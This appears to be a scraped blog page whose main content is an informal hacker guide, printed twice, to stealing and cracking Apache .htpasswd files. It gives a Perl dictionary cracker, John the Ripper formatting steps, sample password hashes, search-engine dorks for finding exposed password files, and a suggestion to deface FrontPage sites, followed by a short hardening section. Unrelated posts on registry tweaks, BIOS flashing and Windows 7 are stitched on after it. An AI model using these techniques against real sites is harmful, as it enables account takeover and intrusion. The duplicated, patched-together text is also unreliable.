This article is intended to be an almost complete guide to cracking and protecting websites which utilize the .htaccess/.htpasswd method for controlling access to data. it’s not intended to be a how-to guide for hacking websites. if you’re looking for a simple howto and not interested in reading in-depth information, then this isn’t the text for you.
I m considering writing a series of guides which for now I m calling “Hungry Hackers Guide”. i do have my malicious streaks (mainly on my own stuff though, I enjoy breaking my own machines), but I am mostly white hat. I guess these guide will basically aim to give white hat hackers a security lecture from a black hat perspective. i dunno. *shrugs*
Basic access control in apache
At it’s most basic level, access control in apache is specified in the httpd.conf (or equivalent file. these were previously three files, now merged into one for simplicity’s sake). the most basic directives are allow from and deny from. the default permissions for any given directory is allow from all (which will allow any client to get pages from that directory).
the format for these directives is as follows:
This will disallow any client from retrieving any file on your server, unless you explicitly allow files further up the tree. However, since sometimes normal users will want to control their own web directories, and it’s impractical (at least, at most, unsafe) to allow webmasters to modify the httpd.conf, we can specify to allow users to override certain directives using the allowoverride directive.
Allow override
Allowoverride (as stated above) allows non-root users to override access controls on a directory. you simply specify which directives you want the user to be able to override (the default is everything), and then apache looks in each directory for a .htaccess file (or other, specified with the AccessFilename directive) and applies the contents of that to it’s access control.
Part of the access control, the part which we will be covering (given the scope of this document) is the authconfig directives. below we’ll view a typical .htaccess file for most sites with moderate to poor security (most porn sites simply use these, porn sites can actually be great practice to crack passwords).
/* a typical .htaccess file */ AuthName "Marvin Martian's Porn Emporium" AuthType Basic AuthUserFile /home/marvin/public_html/members/.htpasswd require valid-user
As you can see above, there aren’t many directives required to provide password protection to a directory. as you can see, in this case, the webmaster has been pretty lazy and stuck the .htpasswd file inside the same directory. the format of the .htpasswd file is simple::
A Bad case
On a poorly secured server, there are no access restrictions on the .htpasswd file. since the .htpasswd file is in a web-accessible directory, and user which is able to authenticate to the directory is able to obtain the password list.
Simply enter the url /members/.htpasswd, and you should receive a full userlist as well as all the encrypted passwords. very silly indeed. if the file doesn’t exist, on a poorly configured server one merely has to read the .htaccess file to obtain the location. if it is below the “web-root”, then it would require a cgi-exploit of some sort to obtain the file. but on any other directory, simply use the browser to obtain the file:
webmaster:TTn.VQRliM8c2 hornyguy:ZpgNeARi106aM fatmike69:drXj18zVxxBVc
Unfortunately, these passwords aren’t of much use in their current form. they require cracking.
Cracking Passwords
Most unix passwords are encrypted using a “one way hash” or “trapdoor hash” - which entails actually losing data from the password in such a way that the original password simply cannot be obtained by reversing the algorithm.
The only way to crack such passwords is using brute force guessing attacks. a simple perl script can be used to achieve this:
#! /usr/bin/perl # crack.pl by fwaggle open (PASSFILE, ".htpasswd"); my @passfile = ; close PASSFILE; open (DICTFILE, "dictionary.txt"); my @dictfile = ; close DICTFILE; foreach $line (@passfile) { my ($username, $encpass) = split(/:/, $line); foreach $attempt (@dictfile) { if ($encpass eq crypt($attempt, $encpass)) { print("Cracked: ${username}:${attempt}\n"); } } }
The above perl script is a simple brute force password cracker. it may or may not work, i didn’t actually test it before writing this article - but it closely resembles one i released to alt.hacking quite a while ago. whether it works or not, you should hopefully be able to see the process which password cracking requires (even for perl, the syntax is almost plain english).
Better Cracking Performance
Perl isn’t the quickest of languages, and using the standard crypt() calls aren’t exactly optimized for high speed cracking. a far better solution is to download a purpose-built, c coded password cracker such as john the ripper. john the ripper is optimized to crack passwords extra fast, as well as it includes an “incremental mode” in case your dictionary should fail to crack a password. ie, in the above example, if the user’s password doesn’t happen to be in the dictionary, then you won’t be able to crack it.
Using an incremental password cracker, every character combination is tried, in an intelligent order (in a vain attempt to save time in something that is wholely unpredictable), so that absolutely any password will be cracked, eventually.
The one problem with john the ripper is that it’s picky about the files that it gets inputted. in order to crack the .htpasswd files, you must edit them to make them appear like regular unix /etc/passwd files. this means adding extra fields, like this:
::1:1:user:/bin/sh:/root
for example, the entries above could look like this:
webmaster:TTn.VQRliM8c2:1:1:webmaster:/bin/sh:/root hornyguy:ZpgNeARi106aM:3:3:hornyguy:/bin/sh:/root fatmike69:drXj18zVxxBVc:3:3:hornyguy:/bin/sh:/root
The windows version doesn’t seem to require this for some reason, so you can just feed it a regular .htpasswd file. note that the windows version may have markedly poor performance when compared to the unix versions.
Finding vulnerable servers
Now that we’ve discussed how to break these passwords, it’s almost time to talk about securing them. if you’re only interested in hax0ring passwords from sites, chances are you’re probably well equipped to crack any password files you might stumble accross. if you’re just looking to hack anything, try searching in google or altavista for a phrase like .htpass, and wade through the results and see if you find a file that says “Index of /something” that contains a .htpasswd file.
if you have permission to read the file, you’ve basically hacked it already. this is admittedly a lame hack, but if you’re bored - do the net in general a favour. crack the passwords, and email them to the admin. that’s all i ever used to do, and you get the same sense of achievement and hacker cred, without the legal problems of defacements.
on a side note, the same results can be achieved by searching for service.pwd. this is the password file for fp-apache, the frontpage server extensions for apache. some really lame admins don’t check permissions on this file, and you can easily gain access to these kinds of systems (and if you’re feeling particularly malicious, just connect with a frontpage client and upload a defacement).
Putting an end to this Nonsense
if you’re running your own site, then here’s the section you’ll really be interested in - stopping someone from doing this to you. the first thing you need to do is prevent users from reading your .ht* files. the easiest way to hinder this is to put the .htpasswd file someplace that’s not web-accessible (such as your home dir, out of ~/public_html).
the next step, as an admin of a server, is to prevent apache from serving these pages from the web. there is no (i repeat NO) reason that a web client should ever need to see these pages, they are for server side configuration only.
so, we can easily accomplish this using the directive, and a niftylittle regular expression:
Order allow,deny Deny from all
this particular example (taken from apache’s httpd.conf, now thankfully included in default distributions to keep lame admins from unknowingly putting themselves at risk) prevents the server from serving any files that begin with .ht. thus, .htaccess and .htpasswd are both protected.
the final step from here is to ensure that the files are protected on the server - meaning file permissions. the ideal situation is to have suEXEC for apache running, and to have the files accessible only by the httpd (but still owned by you). that way, you can chmod the files when you need to edit them, but cgi exploits will not allow users to read the files.
Wrapping it up
well, this concludes my little rant about .htpasswd and .htaccess files. hopefully you learnt something from this. comments are always welcome, just email me. also, if you’re looking for a unix/unix-like irc channel to lurk on, come on my irc network (irc.mooircd.org) and join #hackerzlair - it’s lag free, packet kiddie free, and quite nice.
That about does it I think. Maybe I’ll write some more of these files if I think about it.
I m considering writing a series of guides which for now I m calling “Hungry Hackers Guide”. i do have my malicious streaks (mainly on my own stuff though, I enjoy breaking my own machines), but I am mostly white hat. I guess these guide will basically aim to give white hat hackers a security lecture from a black hat perspective. i dunno. *shrugs*
Basic access control in apache
At it’s most basic level, access control in apache is specified in the httpd.conf (or equivalent file. these were previously three files, now merged into one for simplicity’s sake). the most basic directives are allow from and deny from. the default permissions for any given directory is allow from all (which will allow any client to get pages from that directory).
the format for these directives is as follows:
This will disallow any client from retrieving any file on your server, unless you explicitly allow files further up the tree. However, since sometimes normal users will want to control their own web directories, and it’s impractical (at least, at most, unsafe) to allow webmasters to modify the httpd.conf, we can specify to allow users to override certain directives using the allowoverride directive.
Allow override
Allowoverride (as stated above) allows non-root users to override access controls on a directory. you simply specify which directives you want the user to be able to override (the default is everything), and then apache looks in each directory for a .htaccess file (or other, specified with the AccessFilename directive) and applies the contents of that to it’s access control.
Part of the access control, the part which we will be covering (given the scope of this document) is the authconfig directives. below we’ll view a typical .htaccess file for most sites with moderate to poor security (most porn sites simply use these, porn sites can actually be great practice to crack passwords).
/* a typical .htaccess file */ AuthName "Marvin Martian's Porn Emporium" AuthType Basic AuthUserFile /home/marvin/public_html/members/.htpasswd require valid-user
As you can see above, there aren’t many directives required to provide password protection to a directory. as you can see, in this case, the webmaster has been pretty lazy and stuck the .htpasswd file inside the same directory. the format of the .htpasswd file is simple:
A Bad case
On a poorly secured server, there are no access restrictions on the .htpasswd file. since the .htpasswd file is in a web-accessible directory, and user which is able to authenticate to the directory is able to obtain the password list.
Simply enter the url /members/.htpasswd, and you should receive a full userlist as well as all the encrypted passwords. very silly indeed. if the file doesn’t exist, on a poorly configured server one merely has to read the .htaccess file to obtain the location. if it is below the “web-root”, then it would require a cgi-exploit of some sort to obtain the file. but on any other directory, simply use the browser to obtain the file:
webmaster:TTn.VQRliM8c2 hornyguy:ZpgNeARi106aM fatmike69:drXj18zVxxBVc
Unfortunately, these passwords aren’t of much use in their current form. they require cracking.
Cracking Passwords
Most unix passwords are encrypted using a “one way hash” or “trapdoor hash” - which entails actually losing data from the password in such a way that the original password simply cannot be obtained by reversing the algorithm.
The only way to crack such passwords is using brute force guessing attacks. a simple perl script can be used to achieve this:
#! /usr/bin/perl # crack.pl by fwaggle
The above perl script is a simple brute force password cracker. it may or may not work, i didn’t actually test it before writing this article - but it closely resembles one i released to alt.hacking quite a while ago. whether it works or not, you should hopefully be able to see the process which password cracking requires (even for perl, the syntax is almost plain english).
Better Cracking Performance
Perl isn’t the quickest of languages, and using the standard crypt() calls aren’t exactly optimized for high speed cracking. a far better solution is to download a purpose-built, c coded password cracker such as john the ripper. john the ripper is optimized to crack passwords extra fast, as well as it includes an “incremental mode” in case your dictionary should fail to crack a password. ie, in the above example, if the user’s password doesn’t happen to be in the dictionary, then you won’t be able to crack it.
Using an incremental password cracker, every character combination is tried, in an intelligent order (in a vain attempt to save time in something that is wholely unpredictable), so that absolutely any password will be cracked, eventually.
The one problem with john the ripper is that it’s picky about the files that it gets inputted. in order to crack the .htpasswd files, you must edit them to make them appear like regular unix /etc/passwd files. this means adding extra fields, like this:
for example, the entries above could look like this:
webmaster:TTn.VQRliM8c2:1:1:webmaster:/bin/sh:/root hornyguy:ZpgNeARi106aM:3:3:hornyguy:/bin/sh:/root fatmike69:drXj18zVxxBVc:3:3:hornyguy:/bin/sh:/root
The windows version doesn’t seem to require this for some reason, so you can just feed it a regular .htpasswd file. note that the windows version may have markedly poor performance when compared to the unix versions.
Finding vulnerable servers
Now that we’ve discussed how to break these passwords, it’s almost time to talk about securing them. if you’re only interested in hax0ring passwords from sites, chances are you’re probably well equipped to crack any password files you might stumble accross. if you’re just looking to hack anything, try searching in google or altavista for a phrase like .htpass, and wade through the results and see if you find a file that says “Index of /something” that contains a .htpasswd file.
if you have permission to read the file, you’ve basically hacked it already. this is admittedly a lame hack, but if you’re bored - do the net in general a favour. crack the passwords, and email them to the admin. that’s all i ever used to do, and you get the same sense of achievement and hacker cred, without the legal problems of defacements.
on a side note, the same results can be achieved by searching for service.pwd. this is the password file for fp-apache, the frontpage server extensions for apache. some really lame admins don’t check permissions on this file, and you can easily gain access to these kinds of systems (and if you’re feeling particularly malicious, just connect with a frontpage client and upload a defacement).
Putting an end to this Nonsense
if you’re running your own site, then here’s the section you’ll really be interested in - stopping someone from doing this to you. the first thing you need to do is prevent users from reading your .ht* files. the easiest way to hinder this is to put the .htpasswd file someplace that’s not web-accessible (such as your home dir, out of ~/public_html).
the next step, as an admin of a server, is to prevent apache from serving these pages from the web. there is no (i repeat NO) reason that a web client should ever need to see these pages, they are for server side configuration only.
so, we can easily accomplish this using the
this particular example (taken from apache’s httpd.conf, now thankfully included in default distributions to keep lame admins from unknowingly putting themselves at risk) prevents the server from serving any files that begin with .ht. thus, .htaccess and .htpasswd are both protected.
the final step from here is to ensure that the files are protected on the server - meaning file permissions. the ideal situation is to have suEXEC for apache running, and to have the files accessible only by the httpd (but still owned by you). that way, you can chmod the files when you need to edit them, but cgi exploits will not allow users to read the files.
Wrapping it up
well, this concludes my little rant about .htpasswd and .htaccess files. hopefully you learnt something from this. comments are always welcome, just email me. also, if you’re looking for a unix/unix-like irc channel to lurk on, come on my irc network (irc.mooircd.org) and join #hackerzlair - it’s lag free, packet kiddie free, and quite nice.
That about does it I think. Maybe I’ll write some more of these files if I think about it.
Increase Download Speed
Posted by Sayantan 2:35 AM 0 comments
Dial up Download speed is low and some time it can be unused for advanced user so to improve Dial up Download speed following registry editing is helpfull.
1. Direct in Regedit :
Open
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\ Tcpip\Parameters
Edit as follows:
“SackOpts”=dword:00000001
“TcpWindowSize”=dword:0005ae4c
“Tcp1323Opts”=dword:00000003
“DefaultTTL”=dword:00000040
“EnablePMTUBHDetect”=dword:00000000
“EnablePMTUDiscovery”=dword:00000001
“GlobalMaxTcpWindowSize”=dword:0005ae4c
OR
2. By .Reg file :
Open notepad & paste
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters]
“SackOpts”=dword:00000001
“TcpWindowSize”=dword:0005ae4c
“Tcp1323Opts”=dword:00000003
“DefaultTTL”=dword:00000040
“EnablePMTUBHDetect”=dword:00000000
“EnablePMTUDiscovery”=dword:00000001
“GlobalMaxTcpWindowSize”=dword:0005ae4c
>> Now save this file as speed.reg (in Windows). Execute it and observe the change!
1. Direct in Regedit :
Open
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\ Tcpip\Parameters
Edit as follows:
“SackOpts”=dword:00000001
“TcpWindowSize”=dword:0005ae4c
“Tcp1323Opts”=dword:00000003
“DefaultTTL”=dword:00000040
“EnablePMTUBHDetect”=dword:00000000
“EnablePMTUDiscovery”=dword:00000001
“GlobalMaxTcpWindowSize”=dword:0005ae4c
OR
2. By .Reg file :
Open notepad & paste
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters]
“SackOpts”=dword:00000001
“TcpWindowSize”=dword:0005ae4c
“Tcp1323Opts”=dword:00000003
“DefaultTTL”=dword:00000040
“EnablePMTUBHDetect”=dword:00000000
“EnablePMTUDiscovery”=dword:00000001
“GlobalMaxTcpWindowSize”=dword:0005ae4c
>> Now save this file as speed.reg (in Windows). Execute it and observe the change!
Bios UPDATE
Posted by Sayantan 2:35 AM 0 commentsAll latest Motherboards today, 486/ Pentium / Pentium Pro etc.,ensure that upgrades are easily obtained by incorporating the system BIOS in a FLASH Memory component. With FLASH BIOS, there is no need to replace an EPROM component. Once downloaded, the upgrade utility fits on a floppy disc allowing the user to save, verify and update the system BIOS. A hard drive or a network drive can also be used to run the newer upgrade utilities. However, memory managers can not be installed while upgrading.
Most pre-Pentium motherboards do not have a Flash BIOS. The following instructions therefore do not apply to these boards. If your motherboard does not have a Flash BIOS (EEPROM) you will need to use an EPROM programmer to re-program the BIOS chip. See your dealer for more information about this.
Please read the following instructions in full before starting a Flash BIOS upgrade:
A. Create a Bootable Floppy (in DOS)
•With a non-formatted disk, type the following:
format a:/s
•If using a formatted disk, type:
sys a:
This procedure will ensure a clean boot when you are flashing the new BIOS.
B. Download the BIOS file
•Download the correct BIOS file by clicking on the file name of the BIOS file you wish to download.
•Save the BIOS file and the Flash Utility file in the boot disk you have created. Unzip the BIOS file and the flash utility file. If you don’t have an “unzip” utility, download the WinZip for Windows 95 shareware/ evaluation copy for that one time use from _www.winzip.com or _www.pkware.com. Most CD ROMs found in computer magazines, have a shareware version of WinZip on them.
•You should have extracted two files:
Flash BIOS utility eg: flash7265.exe (for example)
BIOS eg: 6152J900.bin (example)
Use the latest flash utility available unless otherwise specified (either on the BIOS update page or in the archive file). This information is usually provided.
C. Upgrade the System BIOS
During boot up, write down the old BIOS version because you will need to use it for the BIOS backup file name.
Place the bootable floppy disk containing the BIOS file and the Flash Utility in drive a, and reboot the system in MS-DOS, preferably Version 6.22
•At the A:> prompt, type the corresponding Flash BIOS utility and the BIOS file with its extension.
For example:
flash625 615j900.bin
•From the Flash Memory Writer menu, select “Y” to “Do you want to save BIOS?” if you want to save (back up) your current BIOS (strongly recommended), then type the name of your current BIOS and its extension after FILE NAME TO SAVE: eg: a:\613J900.bin
Alternatively select “N” if you don’t want to save your current BIOS. Beware, though, that you won’t be able to recover from a possible failure.
•Select “Y” to “Are you sure to program?”
•Wait until it displays “Message: Power Off or Reset the system”
Once the BIOS has been successfully loaded, remove the floppy disk and reboot the system. If you write to BIOS but cannot complete the procedure, do not switch off, because the computer will not be able to boo, and you will not be given another chance to flash. In this case leave your system on until you resolve the problem (flashing BIOS with old file is a possible solution, provided you’ve made a backup before)
Make sure the new BIOS version has been loaded properly by taking note of the BIOS identifier as the system is rebooting.
For AMI BIOS
Once the BIOS has been successfully loaded, remove the floppy disk and reboot the system holding the “END” key prior to power on until you enter CMOS setup. If you do not do this the first time booting up after upgrading the BIOS, the system will hang.
BIOS Update Tips
note:
1.Make sure never to turn off or reset your computer during the flash process. This will corrupt the BIOS data. We also recommend that you make a copy of your current BIOS on the bootable floppy so you can reflash it if you need to. (This option is not available when flashing an AMI BIOS).
2. If you have problems installing your new BIOS please check the following:
Have you done a clean boot?
In other words, did you follow the above procedure for making a bootable floppy? This ensures that when booting from “A” there are no device drivers on the diskette. Failing to do a clean boot is the most common cause for getting a “Memory Insufficient” error message when attempting to flash a BIOS.
If you have not used a bootable floppy, insure a clean boot either by
a) pressing F5 during bootup
b) by removing all device drivers on the CONFIG.SYS including the HIMEM.SYS. Do this by using the EDIT command.
Have you booted up under DOS?
Booting in Windows is another common cause for getting a “Memory Insufficient” error message when attempting to flash a BIOS. Make sure to boot up to DOS with a minimum set of drivers. Important: Booting in DOS does not mean selecting “Restart computer in MS-DOS Mode” from Windows98/95 shutdown menu or going to Prompt mode in WindowsNT, but rather following the above procedure (format a: /s and rebooting from a:\).
Have you entered the full file name of the flash utility and the BIOS plus its extension?
Do not forget that often you will need to add a drive letter (a:\) before flashing the BIOS. Example: when asked for file name of new BIOS file which is on your floppy disk, in case you’re working from c:\ your will need to type a:\615j900.bin, rather than 615j900.bin only.
Windows Vienna next to VISTA
Posted by Sayantan 2:33 AM 0 commentsIt’s Windows Vienna
Windows 7 (formerly codenamed Blackcomb, then Vienna) is a future version of Microsoft Windows. It is expected to be the successor to Windows Vista. Microsoft has confirmed that the planned development time frame is at least three years, putting the release date around 2010. On July 20, 2007, Microsoft confirmed that Windows 7 is “the internal name for the next version of the Windows Client OS”.
Microsoft has refrained from discussing the details about Windows 7 publicly as they focus on the release and marketing of Windows Vista,though some early details of various core operating system features have emerged at developer conferences such as Windows Hardware Engineering Conference in 2006.
On February 9, 2007, Microsoft’s Ben Fathi claimed that the focus on the operating system was still being worked out, and could merely hint at some possibilities:
“We’re going to look at a fundamental piece of enabling technology. Maybe it’s hypervisors. I don’t know what it is” [...] “Maybe it’s a new user interface paradigm for consumers.
”
Bill Gates, in an interview with Newsweek, also suggested that the next version of Windows would “be more user-centric.” When asked to clarify what he meant, Gates said: “ That means that right now when you move from one PC to another, you’ve got to install apps on each one, do upgrades on each one. Moving information between them is very painful. We can use Live Services to know what you’re interested in. So even if you drop by a [public] kiosk or somebody else’s PC, we can bring down your home page, your files, your fonts, your favorites and those things. So that’s kind of the user-centric thing that Live Services can enable. [Also,] in Vista, things got a lot better with [digital] ink and speech, but by the next release there will be a much bigger bet. Students won’t need textbooks; they can just use these tablet devices. Parallel computing is pretty important for the next release. We’ll make it so that a lot of the high-level graphics will be just built into the operating system. So we’ve got a pretty good outline. ”
Other features
Another feature mentioned by Bill Gates is “a pervasive typing line that will recognize the sentence that [the user is] typing in.” The implications of this could be as simple as a “complete as you type” function as found in most modern search engines, (e.g. Google Suggest) or as complex as being able to give verbal commands to the PC without any concern for syntax.
Subscribe to:
Posts (Atom)
Posts
